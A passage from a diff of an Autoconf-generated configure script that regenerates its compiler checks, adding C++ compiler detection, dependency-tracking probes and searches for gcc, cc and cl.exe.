*.$ac_ext | *.xcoff | *.tds | *.d | *.pdb | *.xSYM | *.bb | *.bbg | *.map | *.inf | *.dSYM | *.o | *.obj ) ;; [ab].out ) # We found the default executable, but exeext='' is most # certainly right. break;; *.* ) - if test "${ac_cv_exeext+set}" = set && test "$ac_cv_exeext" != no; + if test "${ac_cv_exeext+set}" = set && test "$ac_cv_exeext" != no; then :; else ac_cv_exeext=`expr "$ac_file" : '[^.]*\(\..*\)'` fi @@ -2774,78 +3031,42 @@ test "$ac_cv_exeext" = no && ac_cv_exeext= else ac_file='' fi - -{ echo "$as_me:$LINENO: result: $ac_file" >&5 -echo "${ECHO_T}$ac_file" >&6; } -if test -z "$ac_file"; then - echo "$as_me: failed program was:" >&5 +if test -z "$ac_file"; then : + { $as_echo "$as_me:${as_lineno-$LINENO}: result: no" >&5 +$as_echo "no" >&6; } +$as_echo "$as_me: failed program was:" >&5 sed 's/^/| /' conftest.$ac_ext >&5 -{ { echo "$as_me:$LINENO: error: C compiler cannot create executables -See \`config.log' for more details." >&5 -echo "$as_me: error: C compiler cannot create executables -See \`config.log' for more details." >&2;} - { (exit 77); exit 77; }; } +{ { $as_echo "$as_me:${as_lineno-$LINENO}: error: in \`$ac_pwd':" >&5 +$as_echo "$as_me: error: in \`$ac_pwd':" >&2;} +{ as_fn_set_status 77 +as_fn_error "C++ compiler cannot create executables +See \`config.log' for more details." "$LINENO" 5; }; } +else + { $as_echo "$as_me:${as_lineno-$LINENO}: result: yes" >&5 +$as_echo "yes" >&6; } fi - +{ $as_echo "$as_me:${as_lineno-$LINENO}: checking for C++ compiler default output file name" >&5 +$as_echo_n "checking for C++ compiler default output file name... " >&6; } +{ $as_echo "$as_me:${as_lineno-$LINENO}: result: $ac_file" >&5 +$as_echo "$ac_file" >&6; } ac_exeext=$ac_cv_exeext -# Check that the compiler produces executables we can run. If not, either -# the compiler is broken, or we cross compile. -{ echo "$as_me:$LINENO: checking whether the C compiler works" >&5 -echo $ECHO_N "checking whether the C compiler works... $ECHO_C" >&6; } -# FIXME: These cross compiler hacks should be removed for Autoconf 3.0 -# If not cross compiling, check that we can run a simple program. -if test "$cross_compiling" != yes; then - if { ac_try='./$ac_file' - { (case "(($ac_try" in - *\"* | *\`* | *\\*) ac_try_echo=\$ac_try;; - *) ac_try_echo=$ac_try;; -esac -eval "echo \"\$as_me:$LINENO: $ac_try_echo\"") >&5 - (eval "$ac_try") 2>&5 - ac_status=$? - echo "$as_me:$LINENO: \$? = $ac_status" >&5 - (exit $ac_status); }; }; then - cross_compiling=no - else - if test "$cross_compiling" = maybe; then - cross_compiling=yes - else - { { echo "$as_me:$LINENO: error: cannot run C compiled programs. -If you meant to cross compile, use \`--host'. -See \`config.log' for more details." >&5 -echo "$as_me: error: cannot run C compiled programs. -If you meant to cross compile, use \`--host'. -See \`config.log' for more details." >&2;} - { (exit 1); exit 1; }; } - fi - fi -fi -{ echo "$as_me:$LINENO: result: yes" >&5 -echo "${ECHO_T}yes" >&6; } - -rm -f a.out a.exe conftest$ac_cv_exeext b.out +rm -f -r a.out a.out.dSYM a.exe conftest$ac_cv_exeext b.out ac_clean_files=$ac_clean_files_save -# Check that the compiler produces executables we can run. If not, either -# the compiler is broken, or we cross compile. -{ echo "$as_me:$LINENO: checking whether we are cross compiling" >&5 -echo $ECHO_N "checking whether we are cross compiling... $ECHO_C" >&6; } -{ echo "$as_me:$LINENO: result: $cross_compiling" >&5 -echo "${ECHO_T}$cross_compiling" >&6; } - -{ echo "$as_me:$LINENO: checking for suffix of executables" >&5 -echo $ECHO_N "checking for suffix of executables... $ECHO_C" >&6; } -if { (ac_try="$ac_link" +{ $as_echo "$as_me:${as_lineno-$LINENO}: checking for suffix of executables" >&5 +$as_echo_n "checking for suffix of executables... " >&6; } +if { { ac_try="$ac_link" case "(($ac_try" in *\"* | *\`* | *\\*) ac_try_echo=\$ac_try;; *) ac_try_echo=$ac_try;; esac -eval "echo \"\$as_me:$LINENO: $ac_try_echo\"") >&5 +eval ac_try_echo="\"\$as_me:${as_lineno-$LINENO}: $ac_try_echo\"" +$as_echo "$ac_try_echo"; } >&5 (eval "$ac_link") 2>&5 ac_status=$? - echo "$as_me:$LINENO: \$? = $ac_status" >&5 - (exit $ac_status); }; then + $as_echo "$as_me:${as_lineno-$LINENO}: \$? = $ac_status" >&5 + test $ac_status = 0; }; then : # If both `conftest.exe' and `conftest' are `present' (well, observable) # catch `conftest.exe'. For instance with Cygwin, `ls conftest' will # work properly (i.e., refer to `conftest.exe'), while it won't with @@ -2853,37 +3074,90 @@ eval "echo \"\$as_me:$LINENO: $ac_try_echo\"") >&5 for ac_file in conftest.exe conftest conftest.*; do test -f "$ac_file" || continue case $ac_file in - *.$ac_ext | *.xcoff | *.tds | *.d | *.pdb | *.xSYM | *.bb | *.bbg | *.map | *.inf | *.o | *.obj ) ;; + *.$ac_ext | *.xcoff | *.tds | *.d | *.pdb | *.xSYM | *.bb | *.bbg | *.map | *.inf | *.dSYM | *.o | *.obj ) ;; *.* ) ac_cv_exeext=`expr "$ac_file" : '[^.]*\(\..*\)'` break;; * ) break;; esac done else - { { echo "$as_me:$LINENO: error: cannot compute suffix of executables: cannot compile and link -See \`config.log' for more details." >&5 -echo "$as_me: error: cannot compute suffix of executables: cannot compile and link -See \`config.log' for more details." >&2;} - { (exit 1); exit 1; }; } + { { $as_echo "$as_me:${as_lineno-$LINENO}: error: in \`$ac_pwd':" >&5 +$as_echo "$as_me: error: in \`$ac_pwd':" >&2;} +as_fn_error "cannot compute suffix of executables: cannot compile and link +See \`config.log' for more details." "$LINENO" 5; } fi - -rm -f conftest$ac_cv_exeext -{ echo "$as_me:$LINENO: result: $ac_cv_exeext" >&5 -echo "${ECHO_T}$ac_cv_exeext" >&6; } +rm -f conftest conftest$ac_cv_exeext +{ $as_echo "$as_me:${as_lineno-$LINENO}: result: $ac_cv_exeext" >&5 +$as_echo "$ac_cv_exeext" >&6; } rm -f conftest.$ac_ext EXEEXT=$ac_cv_exeext ac_exeext=$EXEEXT -{ echo "$as_me:$LINENO: checking for suffix of object files" >&5 -echo $ECHO_N "checking for suffix of object files... $ECHO_C" >&6; } -if test "${ac_cv_objext+set}" = set; then - echo $ECHO_N "(cached) $ECHO_C" >&6 -else - cat >conftest.$ac_ext <<_ACEOF -/* confdefs.h. */ +cat confdefs.h - <<_ACEOF >conftest.$ac_ext +/* end confdefs.h. */ +#include +int +main () +{ +FILE *f = fopen ("conftest.out", "w"); + return ferror (f) || fclose (f) != 0; + + ; + return 0; +} _ACEOF -cat confdefs.h >>conftest.$ac_ext -cat >>conftest.$ac_ext <<_ACEOF +ac_clean_files="$ac_clean_files conftest.out" +# Check that the compiler produces executables we can run. If not, either +# the compiler is broken, or we cross compile. +{ $as_echo "$as_me:${as_lineno-$LINENO}: checking whether we are cross compiling" >&5 +$as_echo_n "checking whether we are cross compiling... " >&6; } +if test "$cross_compiling" != yes; then + { { ac_try="$ac_link" +case "(($ac_try" in + *\"* | *\`* | *\\*) ac_try_echo=\$ac_try;; + *) ac_try_echo=$ac_try;; +esac +eval ac_try_echo="\"\$as_me:${as_lineno-$LINENO}: $ac_try_echo\"" +$as_echo "$ac_try_echo"; } >&5 + (eval "$ac_link") 2>&5 + ac_status=$? + $as_echo "$as_me:${as_lineno-$LINENO}: \$? = $ac_status" >&5 + test $ac_status = 0; } + if { ac_try='./conftest$ac_cv_exeext' + { { case "(($ac_try" in + *\"* | *\`* | *\\*) ac_try_echo=\$ac_try;; + *) ac_try_echo=$ac_try;; +esac +eval ac_try_echo="\"\$as_me:${as_lineno-$LINENO}: $ac_try_echo\"" +$as_echo "$ac_try_echo"; } >&5 + (eval "$ac_try") 2>&5 + ac_status=$? + $as_echo "$as_me:${as_lineno-$LINENO}: \$? = $ac_status" >&5 + test $ac_status = 0; }; }; then + cross_compiling=no + else + if test "$cross_compiling" = maybe; then + cross_compiling=yes + else + { { $as_echo "$as_me:${as_lineno-$LINENO}: error: in \`$ac_pwd':" >&5 +$as_echo "$as_me: error: in \`$ac_pwd':" >&2;} +as_fn_error "cannot run C++ compiled programs. +If you meant to cross compile, use \`--host'. +See \`config.log' for more details." "$LINENO" 5; } + fi + fi +fi +{ $as_echo "$as_me:${as_lineno-$LINENO}: result: $cross_compiling" >&5 +$as_echo "$cross_compiling" >&6; } + +rm -f conftest.$ac_ext conftest$ac_cv_exeext conftest.out +ac_clean_files=$ac_clean_files_save +{ $as_echo "$as_me:${as_lineno-$LINENO}: checking for suffix of object files" >&5 +$as_echo_n "checking for suffix of object files... " >&6; } +if test "${ac_cv_objext+set}" = set; then : + $as_echo_n "(cached) " >&6 +else + cat confdefs.h - <<_ACEOF >conftest.$ac_ext /* end confdefs.h. */ int @@ -2895,51 +3169,46 @@ main () } _ACEOF rm -f conftest.o conftest.obj -if { (ac_try="$ac_compile" +if { { ac_try="$ac_compile" case "(($ac_try" in *\"* | *\`* | *\\*) ac_try_echo=\$ac_try;; *) ac_try_echo=$ac_try;; esac -eval "echo \"\$as_me:$LINENO: $ac_try_echo\"") >&5 +eval ac_try_echo="\"\$as_me:${as_lineno-$LINENO}: $ac_try_echo\"" +$as_echo "$ac_try_echo"; } >&5 (eval "$ac_compile") 2>&5 ac_status=$? - echo "$as_me:$LINENO: \$? = $ac_status" >&5 - (exit $ac_status); }; then + $as_echo "$as_me:${as_lineno-$LINENO}: \$? = $ac_status" >&5 + test $ac_status = 0; }; then : for ac_file in conftest.o conftest.obj conftest.*; do test -f "$ac_file" || continue; case $ac_file in - *.$ac_ext | *.xcoff | *.tds | *.d | *.pdb | *.xSYM | *.bb | *.bbg | *.map | *.inf ) ;; + *.$ac_ext | *.xcoff | *.tds | *.d | *.pdb | *.xSYM | *.bb | *.bbg | *.map | *.inf | *.dSYM ) ;; *) ac_cv_objext=`expr "$ac_file" : '.*\.\(.*\)'` break;; esac done else - echo "$as_me: failed program was:" >&5 + $as_echo "$as_me: failed program was:" >&5 sed 's/^/| /' conftest.$ac_ext >&5 -{ { echo "$as_me:$LINENO: error: cannot compute suffix of object files: cannot compile -See \`config.log' for more details." >&5 -echo "$as_me: error: cannot compute suffix of object files: cannot compile -See \`config.log' for more details." >&2;} - { (exit 1); exit 1; }; } +{ { $as_echo "$as_me:${as_lineno-$LINENO}: error: in \`$ac_pwd':" >&5 +$as_echo "$as_me: error: in \`$ac_pwd':" >&2;} +as_fn_error "cannot compute suffix of object files: cannot compile +See \`config.log' for more details." "$LINENO" 5; } fi - rm -f conftest.$ac_cv_objext conftest.$ac_ext fi -{ echo "$as_me:$LINENO: result: $ac_cv_objext" >&5 -echo "${ECHO_T}$ac_cv_objext" >&6; } +{ $as_echo "$as_me:${as_lineno-$LINENO}: result: $ac_cv_objext" >&5 +$as_echo "$ac_cv_objext" >&6; } OBJEXT=$ac_cv_objext ac_objext=$OBJEXT -{ echo "$as_me:$LINENO: checking whether we are using the GNU C compiler" >&5 -echo $ECHO_N "checking whether we are using the GNU C compiler... $ECHO_C" >&6; } -if test "${ac_cv_c_compiler_gnu+set}" = set; then - echo $ECHO_N "(cached) $ECHO_C" >&6 +{ $as_echo "$as_me:${as_lineno-$LINENO}: checking whether we are using the GNU C++ compiler" >&5 +$as_echo_n "checking whether we are using the GNU C++ compiler... " >&6; } +if test "${ac_cv_cxx_compiler_gnu+set}" = set; then : + $as_echo_n "(cached) " >&6 else - cat >conftest.$ac_ext <<_ACEOF -/* confdefs.h. */ -_ACEOF -cat confdefs.h >>conftest.$ac_ext -cat >>conftest.$ac_ext <<_ACEOF + cat confdefs.h - <<_ACEOF >conftest.$ac_ext /* end confdefs.h. */ int @@ -2953,54 +3222,672 @@ main () return 0; } _ACEOF -rm -f conftest.$ac_objext -if { (ac_try="$ac_compile" +if ac_fn_cxx_try_compile "$LINENO"; then : + ac_compiler_gnu=yes +else + ac_compiler_gnu=no +fi +rm -f core conftest.err conftest.$ac_objext conftest.$ac_ext +ac_cv_cxx_compiler_gnu=$ac_compiler_gnu + +fi +{ $as_echo "$as_me:${as_lineno-$LINENO}: result: $ac_cv_cxx_compiler_gnu" >&5 +$as_echo "$ac_cv_cxx_compiler_gnu" >&6; } +if test $ac_compiler_gnu = yes; then + GXX=yes +else + GXX= +fi +ac_test_CXXFLAGS=${CXXFLAGS+set} +ac_save_CXXFLAGS=$CXXFLAGS +{ $as_echo "$as_me:${as_lineno-$LINENO}: checking whether $CXX accepts -g" >&5 +$as_echo_n "checking whether $CXX accepts -g... " >&6; } +if test "${ac_cv_prog_cxx_g+set}" = set; then : + $as_echo_n "(cached) " >&6 +else + ac_save_cxx_werror_flag=$ac_cxx_werror_flag + ac_cxx_werror_flag=yes + ac_cv_prog_cxx_g=no + CXXFLAGS="-g" + cat confdefs.h - <<_ACEOF >conftest.$ac_ext +/* end confdefs.h. */ + +int +main () +{ + + ; + return 0; +} +_ACEOF +if ac_fn_cxx_try_compile "$LINENO"; then : + ac_cv_prog_cxx_g=yes +else + CXXFLAGS="" + cat confdefs.h - <<_ACEOF >conftest.$ac_ext +/* end confdefs.h. */ + +int +main () +{ + + ; + return 0; +} +_ACEOF +if ac_fn_cxx_try_compile "$LINENO"; then : + +else + ac_cxx_werror_flag=$ac_save_cxx_werror_flag + CXXFLAGS="-g" + cat confdefs.h - <<_ACEOF >conftest.$ac_ext +/* end confdefs.h. */ + +int +main () +{ + + ; + return 0; +} +_ACEOF +if ac_fn_cxx_try_compile "$LINENO"; then : + ac_cv_prog_cxx_g=yes +fi +rm -f core conftest.err conftest.$ac_objext conftest.$ac_ext +fi +rm -f core conftest.err conftest.$ac_objext conftest.$ac_ext +fi +rm -f core conftest.err conftest.$ac_objext conftest.$ac_ext + ac_cxx_werror_flag=$ac_save_cxx_werror_flag +fi +{ $as_echo "$as_me:${as_lineno-$LINENO}: result: $ac_cv_prog_cxx_g" >&5 +$as_echo "$ac_cv_prog_cxx_g" >&6; } +if test "$ac_test_CXXFLAGS" = set; then + CXXFLAGS=$ac_save_CXXFLAGS +elif test $ac_cv_prog_cxx_g = yes; then + if test "$GXX" = yes; then + CXXFLAGS="-g -O2" + else + CXXFLAGS="-g" + fi +else + if test "$GXX" = yes; then + CXXFLAGS="-O2" + else + CXXFLAGS= + fi +fi +ac_ext=c +ac_cpp='$CPP $CPPFLAGS' +ac_compile='$CC -c $CFLAGS $CPPFLAGS conftest.$ac_ext >&5' +ac_link='$CC -o conftest$ac_exeext $CFLAGS $CPPFLAGS $LDFLAGS conftest.$ac_ext $LIBS >&5' +ac_compiler_gnu=$ac_cv_c_compiler_gnu +DEPDIR="${am__leading_dot}deps" + +ac_config_commands="$ac_config_commands depfiles" + + +am_make=${MAKE-make} +cat > confinc << 'END' +am__doit: + @echo this is the am__doit target +.PHONY: am__doit +END +# If we don't find an include directive, just comment out the code. +{ $as_echo "$as_me:${as_lineno-$LINENO}: checking for style of include used by $am_make" >&5 +$as_echo_n "checking for style of include used by $am_make... " >&6; } +am__include="#" +am__quote= +_am_result=none +# First try GNU make style include. +echo "include confinc" > confmf +# Ignore all kinds of additional output from `make'. +case `$am_make -s -f confmf 2> /dev/null` in #( +*the\ am__doit\ target*) + am__include=include + am__quote= + _am_result=GNU + ;; +esac +# Now try BSD make style include. +if test "$am__include" = "#"; then + echo '.include "confinc"' > confmf + case `$am_make -s -f confmf 2> /dev/null` in #( + *the\ am__doit\ target*) + am__include=.include + am__quote="\"" + _am_result=BSD + ;; + esac +fi + + +{ $as_echo "$as_me:${as_lineno-$LINENO}: result: $_am_result" >&5 +$as_echo "$_am_result" >&6; } +rm -f confinc confmf + +# Check whether --enable-dependency-tracking was given. +if test "${enable_dependency_tracking+set}" = set; then : + enableval=$enable_dependency_tracking; +fi + +if test "x$enable_dependency_tracking" != xno; then + am_depcomp="$ac_aux_dir/depcomp" + AMDEPBACKSLASH='\' +fi + if test "x$enable_dependency_tracking" != xno; then + AMDEP_TRUE= + AMDEP_FALSE='#' +else + AMDEP_TRUE='#' + AMDEP_FALSE= +fi + + + +depcc="$CXX" am_compiler_list= + +{ $as_echo "$as_me:${as_lineno-$LINENO}: checking dependency style of $depcc" >&5 +$as_echo_n "checking dependency style of $depcc... " >&6; } +if test "${am_cv_CXX_dependencies_compiler_type+set}" = set; then : + $as_echo_n "(cached) " >&6 +else + if test -z "$AMDEP_TRUE" && test -f "$am_depcomp"; then + # We make a subdir and do the tests there. Otherwise we can end up + # making bogus files that we don't know about and never remove. For + # instance it was reported that on HP-UX the gcc test will end up + # making a dummy file named `D' -- because `-MD' means `put the output + # in D'. + mkdir conftest.dir + # Copy depcomp to subdir because otherwise we won't find it if we're + # using a relative directory. + cp "$am_depcomp" conftest.dir + cd conftest.dir + # We will build objects and dependencies in a subdirectory because + # it helps to detect inapplicable dependency modes. For instance + # both Tru64's cc and ICC support -MD to output dependencies as a + # side effect of compilation, but ICC will put the dependencies in + # the current directory while Tru64 will put them in the object + # directory. + mkdir sub + + am_cv_CXX_dependencies_compiler_type=none + if test "$am_compiler_list" = ""; then + am_compiler_list=`sed -n 's/^#*\([a-zA-Z0-9]*\))$/\1/p' < ./depcomp` + fi + am__universal=false + case " $depcc " in #( + *\ -arch\ *\ -arch\ *) am__universal=true ;; + esac + + for depmode in $am_compiler_list; do + # Setup a source with many dependencies, because some compilers + # like to wrap large dependency lists on column 80 (with \), and + # we should not choose a depcomp mode which is confused by this. + # + # We need to recreate these files for each test, as the compiler may + # overwrite some of them when testing with obscure command lines. + # This happens at least with the AIX C compiler. + : > sub/conftest.c + for i in 1 2 3 4 5 6; do + echo '#include "conftst'$i'.h"' >> sub/conftest.c + # Using `: > sub/conftst$i.h' creates only sub/conftst1.h with + # Solaris 8's {/usr,}/bin/sh. + touch sub/conftst$i.h + done + echo "${am__include} ${am__quote}sub/conftest.Po${am__quote}" > confmf + + # We check with `-c' and `-o' for the sake of the "dashmstdout" + # mode. It turns out that the SunPro C++ compiler does not properly + # handle `-M -o', and we need to detect this. Also, some Intel + # versions had trouble with output in subdirs + am__obj=sub/conftest.${OBJEXT-o} + am__minus_obj="-o $am__obj" + case $depmode in + gcc) + # This depmode causes a compiler race in universal mode. + test "$am__universal" = false || continue + ;; + nosideeffect) + # after this tag, mechanisms are not by side-effect, so they'll + # only be used when explicitly requested + if test "x$enable_dependency_tracking" = xyes; then + continue + else + break + fi + ;; + msvisualcpp | msvcmsys) + # This compiler won't grok `-c -o', but also, the minuso test has + # not run yet. These depmodes are late enough in the game, and + # so weak that their functioning should not be impacted. + am__obj=conftest.${OBJEXT-o} + am__minus_obj= + ;; + none) break ;; + esac + if depmode=$depmode \ + source=sub/conftest.c object=$am__obj \ + depfile=sub/conftest.Po tmpdepfile=sub/conftest.TPo \ + $SHELL ./depcomp $depcc -c $am__minus_obj sub/conftest.c \ + >/dev/null 2>conftest.err && + grep sub/conftst1.h sub/conftest.Po > /dev/null 2>&1 && + grep sub/conftst6.h sub/conftest.Po > /dev/null 2>&1 && + grep $am__obj sub/conftest.Po > /dev/null 2>&1 && + ${MAKE-make} -s -f confmf > /dev/null 2>&1; then + # icc doesn't choke on unknown options, it will just issue warnings + # or remarks (even with -Werror). So we grep stderr for any message + # that says an option was ignored or not supported. + # When given -MP, icc 7.0 and 7.1 complain thusly: + # icc: Command line warning: ignoring option '-M'; no argument required + # The diagnosis changed in icc 8.0: + # icc: Command line remark: option '-MP' not supported + if (grep 'ignoring option' conftest.err || + grep 'not supported' conftest.err) >/dev/null 2>&1; then :; else + am_cv_CXX_dependencies_compiler_type=$depmode + break + fi + fi + done + + cd .. + rm -rf conftest.dir +else + am_cv_CXX_dependencies_compiler_type=none +fi + +fi +{ $as_echo "$as_me:${as_lineno-$LINENO}: result: $am_cv_CXX_dependencies_compiler_type" >&5 +$as_echo "$am_cv_CXX_dependencies_compiler_type" >&6; } +CXXDEPMODE=depmode=$am_cv_CXX_dependencies_compiler_type + + if + test "x$enable_dependency_tracking" != xno \ + && test "$am_cv_CXX_dependencies_compiler_type" = gcc3; then + am__fastdepCXX_TRUE= + am__fastdepCXX_FALSE='#' +else + am__fastdepCXX_TRUE='#' + am__fastdepCXX_FALSE= +fi + + +ac_ext=c +ac_cpp='$CPP $CPPFLAGS' +ac_compile='$CC -c $CFLAGS $CPPFLAGS conftest.$ac_ext >&5' +ac_link='$CC -o conftest$ac_exeext $CFLAGS $CPPFLAGS $LDFLAGS conftest.$ac_ext $LIBS >&5' +ac_compiler_gnu=$ac_cv_c_compiler_gnu +if test -n "$ac_tool_prefix"; then + # Extract the first word of "${ac_tool_prefix}gcc", so it can be a program name with args. +set dummy ${ac_tool_prefix}gcc; ac_word=$2 +{ $as_echo "$as_me:${as_lineno-$LINENO}: checking for $ac_word" >&5 +$as_echo_n "checking for $ac_word... " >&6; } +if test "${ac_cv_prog_CC+set}" = set; then : + $as_echo_n "(cached) " >&6 +else + if test -n "$CC"; then + ac_cv_prog_CC="$CC" # Let the user override the test. +else +as_save_IFS=$IFS; IFS=$PATH_SEPARATOR +for as_dir in $PATH +do + IFS=$as_save_IFS + test -z "$as_dir" && as_dir=. + for ac_exec_ext in '' $ac_executable_extensions; do + if { test -f "$as_dir/$ac_word$ac_exec_ext" && $as_test_x "$as_dir/$ac_word$ac_exec_ext"; }; then + ac_cv_prog_CC="${ac_tool_prefix}gcc" + $as_echo "$as_me:${as_lineno-$LINENO}: found $as_dir/$ac_word$ac_exec_ext" >&5 + break 2 + fi +done + done +IFS=$as_save_IFS + +fi +fi +CC=$ac_cv_prog_CC +if test -n "$CC"; then + { $as_echo "$as_me:${as_lineno-$LINENO}: result: $CC" >&5 +$as_echo "$CC" >&6; } +else + { $as_echo "$as_me:${as_lineno-$LINENO}: result: no" >&5 +$as_echo "no" >&6; } +fi + + +fi +if test -z "$ac_cv_prog_CC"; then + ac_ct_CC=$CC + # Extract the first word of "gcc", so it can be a program name with args. +set dummy gcc; ac_word=$2 +{ $as_echo "$as_me:${as_lineno-$LINENO}: checking for $ac_word" >&5 +$as_echo_n "checking for $ac_word... " >&6; } +if test "${ac_cv_prog_ac_ct_CC+set}" = set; then : + $as_echo_n "(cached) " >&6 +else + if test -n "$ac_ct_CC"; then + ac_cv_prog_ac_ct_CC="$ac_ct_CC" # Let the user override the test. +else +as_save_IFS=$IFS; IFS=$PATH_SEPARATOR +for as_dir in $PATH +do + IFS=$as_save_IFS + test -z "$as_dir" && as_dir=. + for ac_exec_ext in '' $ac_executable_extensions; do + if { test -f "$as_dir/$ac_word$ac_exec_ext" && $as_test_x "$as_dir/$ac_word$ac_exec_ext"; }; then + ac_cv_prog_ac_ct_CC="gcc" + $as_echo "$as_me:${as_lineno-$LINENO}: found $as_dir/$ac_word$ac_exec_ext" >&5 + break 2 + fi +done + done +IFS=$as_save_IFS + +fi +fi +ac_ct_CC=$ac_cv_prog_ac_ct_CC +if test -n "$ac_ct_CC"; then + { $as_echo "$as_me:${as_lineno-$LINENO}: result: $ac_ct_CC" >&5 +$as_echo "$ac_ct_CC" >&6; } +else + { $as_echo "$as_me:${as_lineno-$LINENO}: result: no" >&5 +$as_echo "no" >&6; } +fi + + if test "x$ac_ct_CC" = x; then + CC="" + else + case $cross_compiling:$ac_tool_warned in +yes:) +{ $as_echo "$as_me:${as_lineno-$LINENO}: WARNING: using cross tools not prefixed with host triplet" >&5 +$as_echo "$as_me: WARNING: using cross tools not prefixed with host triplet" >&2;} +ac_tool_warned=yes ;; +esac + CC=$ac_ct_CC + fi +else + CC="$ac_cv_prog_CC" +fi + +if test -z "$CC"; then + if test -n "$ac_tool_prefix"; then + # Extract the first word of "${ac_tool_prefix}cc", so it can be a program name with args. +set dummy ${ac_tool_prefix}cc; ac_word=$2 +{ $as_echo "$as_me:${as_lineno-$LINENO}: checking for $ac_word" >&5 +$as_echo_n "checking for $ac_word... " >&6; } +if test "${ac_cv_prog_CC+set}" = set; then : + $as_echo_n "(cached) " >&6 +else + if test -n "$CC"; then + ac_cv_prog_CC="$CC" # Let the user override the test. +else +as_save_IFS=$IFS; IFS=$PATH_SEPARATOR +for as_dir in $PATH +do + IFS=$as_save_IFS + test -z "$as_dir" && as_dir=. + for ac_exec_ext in '' $ac_executable_extensions; do + if { test -f "$as_dir/$ac_word$ac_exec_ext" && $as_test_x "$as_dir/$ac_word$ac_exec_ext"; }; then + ac_cv_prog_CC="${ac_tool_prefix}cc" + $as_echo "$as_me:${as_lineno-$LINENO}: found $as_dir/$ac_word$ac_exec_ext" >&5 + break 2 + fi +done + done +IFS=$as_save_IFS + +fi +fi +CC=$ac_cv_prog_CC +if test -n "$CC"; then + { $as_echo "$as_me:${as_lineno-$LINENO}: result: $CC" >&5 +$as_echo "$CC" >&6; } +else + { $as_echo "$as_me:${as_lineno-$LINENO}: result: no" >&5 +$as_echo "no" >&6; } +fi + + + fi +fi +if test -z "$CC"; then + # Extract the first word of "cc", so it can be a program name with args. +set dummy cc; ac_word=$2 +{ $as_echo "$as_me:${as_lineno-$LINENO}: checking for $ac_word" >&5 +$as_echo_n "checking for $ac_word... " >&6; } +if test "${ac_cv_prog_CC+set}" = set; then : + $as_echo_n "(cached) " >&6 +else + if test -n "$CC"; then + ac_cv_prog_CC="$CC" # Let the user override the test. +else + ac_prog_rejected=no +as_save_IFS=$IFS; IFS=$PATH_SEPARATOR +for as_dir in $PATH +do + IFS=$as_save_IFS + test -z "$as_dir" && as_dir=. + for ac_exec_ext in '' $ac_executable_extensions; do + if { test -f "$as_dir/$ac_word$ac_exec_ext" && $as_test_x "$as_dir/$ac_word$ac_exec_ext"; }; then + if test "$as_dir/$ac_word$ac_exec_ext" = "/usr/ucb/cc"; then + ac_prog_rejected=yes + continue + fi + ac_cv_prog_CC="cc" + $as_echo "$as_me:${as_lineno-$LINENO}: found $as_dir/$ac_word$ac_exec_ext" >&5 + break 2 + fi +done + done +IFS=$as_save_IFS + +if test $ac_prog_rejected = yes; then + # We found a bogon in the path, so make sure we never use it. + set dummy $ac_cv_prog_CC + shift + if test $# != 0; then + # We chose a different compiler from the bogus one. + # However, it has the same basename, so the bogon will be chosen + # first if we set CC to just the basename; use the full file name. + shift + ac_cv_prog_CC="$as_dir/$ac_word${1+' '}$@" + fi +fi +fi +fi +CC=$ac_cv_prog_CC +if test -n "$CC"; then + { $as_echo "$as_me:${as_lineno-$LINENO}: result: $CC" >&5 +$as_echo "$CC" >&6; } +else + { $as_echo "$as_me:${as_lineno-$LINENO}: result: no" >&5 +$as_echo "no" >&6; } +fi + + +fi +if test -z "$CC"; then + if test -n "$ac_tool_prefix"; then + for ac_prog in cl.exe + do + # Extract the first word of "$ac_tool_prefix$ac_prog", so it can be a program name with args. +set dummy $ac_tool_prefix$ac_prog; ac_word=$2 +{ $as_echo "$as_me:${as_lineno-$LINENO}: checking for $ac_word" >&5 +$as_echo_n "checking for $ac_word... " >&6; } +if test "${ac_cv_prog_CC+set}" = set; then : + $as_echo_n "(cached) " >&6 +else + if test -n "$CC"; then + ac_cv_prog_CC="$CC" # Let the user override the test. +else +as_save_IFS=$IFS; IFS=$PATH_SEPARATOR +for as_dir in $PATH +do + IFS=$as_save_IFS + test -z "$as_dir" && as_dir=. + for ac_exec_ext in '' $ac_executable_extensions; do + if { test -f "$as_dir/$ac_word$ac_exec_ext" && $as_test_x "$as_dir/$ac_word$ac_exec_ext"; }; then + ac_cv_prog_CC="$ac_tool_prefix$ac_prog" + $as_echo "$as_me:${as_lineno-$LINENO}: found $as_dir/$ac_word$ac_exec_ext" >&5 + break 2 + fi +done + done +IFS=$as_save_IFS + +fi +fi +CC=$ac_cv_prog_CC +if test -n "$CC"; then + { $as_echo "$as_me:${as_lineno-$LINENO}: result: $CC" >&5 +$as_echo "$CC" >&6; } +else + { $as_echo "$as_me:${as_lineno-$LINENO}: result: no" >&5 +$as_echo "no" >&6; } +fi + + + test -n "$CC" && break + done +fi +if test -z "$CC"; then + ac_ct_CC=$CC + for ac_prog in cl.exe +do + # Extract the first word of "$ac_prog", so it can be a program name with args. +set dummy $ac_prog; ac_word=$2 +{ $as_echo "$as_me:${as_lineno-$LINENO}: checking for $ac_word" >&5 +$as_echo_n "checking for $ac_word... " >&6; } +if test "${ac_cv_prog_ac_ct_CC+set}" = set; then : + $as_echo_n "(cached) " >&6 +else + if test -n "$ac_ct_CC"; then + ac_cv_prog_ac_ct_CC="$ac_ct_CC" # Let the user override the test. +else +as_save_IFS=$IFS; IFS=$PATH_SEPARATOR +for as_dir in $PATH +do + IFS=$as_save_IFS + test -z "$as_dir" && as_dir=. + for ac_exec_ext in '' $ac_executable_extensions; do + if { test -f "$as_dir/$ac_word$ac_exec_ext" && $as_test_x "$as_dir/$ac_word$ac_exec_ext"; }; then + ac_cv_prog_ac_ct_CC="$ac_prog" + $as_echo "$as_me:${as_lineno-$LINENO}: found $as_dir/$ac_word$ac_exec_ext" >&5 + break 2 + fi +done + done +IFS=$as_save_IFS + +fi +fi +ac_ct_CC=$ac_cv_prog_ac_ct_CC +if test -n "$ac_ct_CC"; then + { $as_echo "$as_me:${as_lineno-$LINENO}: result: $ac_ct_CC" >&5 +$as_echo "$ac_ct_CC" >&6; } +else + { $as_echo "$as_me:${as_lineno-$LINENO}: result: no" >&5 +$as_echo "no" >&6; } +fi + + + test -n "$ac_ct_CC" && break +done + + if test "x$ac_ct_CC" = x; then + CC="" + else + case $cross_compiling:$ac_tool_warned in +yes:) +{ $as_echo "$as_me:${as_lineno-$LINENO}: WARNING: using cross tools not prefixed with host triplet" >&5 +$as_echo "$as_me: WARNING: using cross tools not prefixed with host triplet" >&2;} +ac_tool_warned=yes ;; +esac + CC=$ac_ct_CC + fi +fi + +fi + + +test -z "$CC" && { { $as_echo "$as_me:${as_lineno-$LINENO}: error: in \`$ac_pwd':" >&5 